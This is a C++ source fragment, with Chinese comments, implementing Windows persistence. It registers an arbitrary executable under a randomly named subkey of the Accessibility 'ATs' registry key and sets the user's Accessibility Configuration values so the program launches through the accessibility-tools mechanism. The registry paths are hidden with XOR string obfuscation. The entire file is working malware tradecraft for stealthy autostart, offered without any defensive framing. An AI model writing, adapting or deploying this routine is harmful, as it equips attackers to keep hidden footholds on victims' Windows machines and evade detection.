int get_rand(std::size_t _min,std::size_t _max)
{
std::random_device r;
std::mt19937 rand(r());
std::uniform_int_distribution<int> uniform_dist(_min, _max);
return uniform_dist(rand);
}
bool install_ATs(LPCTSTR ExePath, LPCTSTR Arg)
{
//ATS安装exe持久化
//HKEY_LOCAL_MACHINE
//SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
HKEY hKey = nullptr;
HKEY hKey1 = nullptr;
HKEY hKey2 = nullptr;
auto exit_sope = std::experimental::make_scope_exit([&]() {
RegCloseKey(hKey);
RegCloseKey(hKey1);
RegCloseKey(hKey2);
});
do {
auto status = RegOpenKeyExW(
HKEY_LOCAL_MACHINE,
XorStringW(L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"),
0,
KEY_ALL_ACCESS,
&hKey);
if (status != ERROR_SUCCESS)
{
break;
}
//随机名字
WCHAR *pRandArray = XorStringW(L"qwertyuiopasdfghjklzxcvbnm1234567890");
WCHAR newName[8] = {};
for (auto i=0;i<RTL_NUMBER_OF(newName)-1;i++)
{
newName[i] = pRandArray[get_rand(0, wcslen(pRandArray))];
}
//创建子健
status = RegCreateKeyEx(hKey,
newName,
0,
nullptr,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
nullptr,
&hKey1,
nullptr);
if (status!=ERROR_SUCCESS)
{
break;
}
status = RegSetValueExW(hKey1, XorStringW(L"StartExe"),
0, REG_SZ, (const BYTE*)ExePath, (DWORD)(sizeof(TCHAR)*(_tcslen(ExePath) + 1)));
if (status!=ERROR_SUCCESS)
{
break;
}
status = RegSetValueExW(hKey1, XorStringW(L"StartParams"),
0, REG_SZ, (const BYTE*)Arg, (DWORD)(sizeof(TCHAR)*(_tcslen(Arg) + 1)));
if (status != ERROR_SUCCESS)
{
break;
}
//SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1
status = RegCreateKeyEx(HKEY_CURRENT_USER,
XorStringW(L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility"),
0,
nullptr,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
nullptr,
&hKey2,
nullptr);
if (status!=ERROR_SUCCESS)
{
break;
}
status = RegSetValueExW(hKey2, XorStringW(L"Configuration"),
0, REG_SZ, (const BYTE*)newName, sizeof(newName));
if (status != ERROR_SUCCESS)
{
break;
}
RegCloseKey(hKey2);
status = RegCreateKeyEx(HKEY_CURRENT_USER,
XorStringW(L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session1"),
0,
nullptr,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
nullptr,
&hKey2,
nullptr);
if (status!=ERROR_SUCCESS)
{
break;
}
status = RegSetValueExW(hKey2, XorStringW(L"Configuration"),
0, REG_SZ, (const BYTE*)newName, sizeof(newName));
if (status != ERROR_SUCCESS)
{
break;
}
return true;
} while (0);
return false;
}